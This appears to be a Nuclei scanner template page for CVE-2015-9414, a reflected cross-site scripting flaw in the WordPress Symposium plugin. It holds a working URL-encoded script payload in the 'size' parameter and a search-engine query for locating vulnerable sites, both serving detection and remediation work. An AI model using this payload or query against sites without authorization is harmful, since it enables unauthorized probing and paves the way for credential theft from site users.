WordPress Symposium <=15.8.1 - Cross-Site Scripting

ID: CVE-2015-9414

Severity: medium

Author: daffainfo

Tags: cve2015,cve,xss,wpscan,wordpress,wp-plugin,wpsymposiumpro

Description

WordPress Symposium through 15.8.1 contains a reflected cross-site scripting vulnerability via the wp-content/plugins/wp-symposium/get_album_item.php?size parameter which allows an attacker to steal cookie-based authentication credentials and launch other attacks.

YAML Source

id: CVE-2015-9414

info:
  name: WordPress Symposium <=15.8.1 - Cross-Site Scripting
  author: daffainfo
  severity: medium
  description: WordPress Symposium through 15.8.1 contains a reflected cross-site scripting vulnerability via the wp-content/plugins/wp-symposium/get_album_item.php?size parameter which allows an attacker to steal cookie-based authentication credentials and launch other attacks.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions.
  remediation: |
    Update to the latest version of the WordPress Symposium plugin (>=15.8.2) which includes a fix for this vulnerability.
  reference:
    - https://wpscan.com/vulnerability/2ac2d43f-bf3f-4831-9585-5c5484051095
    - https://wpvulndb.com/vulnerabilities/8175
    - https://wordpress.org/plugins/wp-symposium/#developers
    - https://nvd.nist.gov/vuln/detail/CVE-2015-9414
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2015-9414
    cwe-id: CWE-79
    epss-score: 0.00111
    epss-percentile: 0.44236
    cpe: cpe:2.3:a:wpsymposiumpro:wp-symposium:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: wpsymposiumpro
    product: "wp-symposium"
    framework: wordpress
    google-query: "inurl:\"/wp-content/plugins/wp-symposium\""
  tags: cve2015,cve,xss,wpscan,wordpress,wp-plugin,wpsymposiumpro
flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/wp-symposium/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        internal: true
        words:
          - 'WP Symposium'
          - 'Tags:'
        condition: and

  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/wp-symposium/get_album_item.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '</script><script>alert(document.domain)</script>'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 490a004630440220593a9f645fb54e80dd9f54118fccac0cad62bc5010bab8f9faa92755f2b45c5702202bcd48ebb947a3e445c430ed4c24e29650a6d855f428ebde58f77ae87e370571:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cves/2015/CVE-2015-9414.yaml"

View on Github